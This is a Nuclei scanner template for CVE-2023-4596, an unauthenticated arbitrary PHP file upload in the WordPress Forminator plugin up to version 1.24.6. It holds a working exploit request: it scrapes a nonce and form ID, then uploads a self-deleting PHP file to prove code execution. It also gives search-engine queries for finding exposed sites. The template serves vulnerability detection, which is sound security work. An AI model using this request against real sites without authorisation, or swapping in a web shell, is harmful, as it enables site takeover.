nuclei-templates/http/cves/2023/CVE-2023-4596.yaml

125 lines
4.1 KiB
YAML

id: CVE-2023-4596
info:
name: WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload
author: E1A
severity: critical
description: |
The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
reference:
- https://www.exploit-db.com/exploits/51664
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve
- https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php
- https://github.com/E1A/CVE-2023-4596
- https://nvd.nist.gov/vuln/detail/CVE-2023-4596
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-4596
cwe-id: CWE-434
epss-score: 0.07197
epss-percentile: 0.94017
cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: incsub
product: forminator
framework: wordpress
shodan-query: http.html:/wp-content/plugins/forminator
fofa-query: body=/wp-content/plugins/forminator
publicwww-query:
- /wp-content/plugins/Forminator
- /wp-content/plugins/forminator
tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub
variables:
string: "CVE-2023-4596"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="textarea-1"
{{randstr}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="phone-1"
{{rand_int(10)}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="email-1"
test@gmail.com
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="name-1"
{{randstr}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="forminator_nonce"
{{forminator_nonce}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="form_id"
{{form_id}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="current_url"
{{BaseURL}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="action"
forminator_submit_form_custom-forms
------WebKitFormBoundaryBLOYSueQAdgN2PRe
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- 'Upload file</label>'
- 'forminator-field-upload'
condition: and
- type: word
part: body_2
words:
- '{"success":true'
- '"form_id":"{{form_id}}"'
- '"behav'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: forminator_nonce
part: body
group: 1
regex:
- 'name="forminator_nonce" value="([a-z0-9]+)" \/>'
internal: true
- type: regex
name: form_id
part: body
group: 1
regex:
- 'name="form_id" value="([0-9]+)">'
internal: true
# digest: 4a0a00473045022070dc193749f022e275bc9e3088894ea4afbaf6a94fb3f69105f67c63de7db08502210084147b4af64481e2756f95e326afa7e6d43c2c86e2ffcf85939cda69f0037071:922c64590222798bb761d5b6d8e72950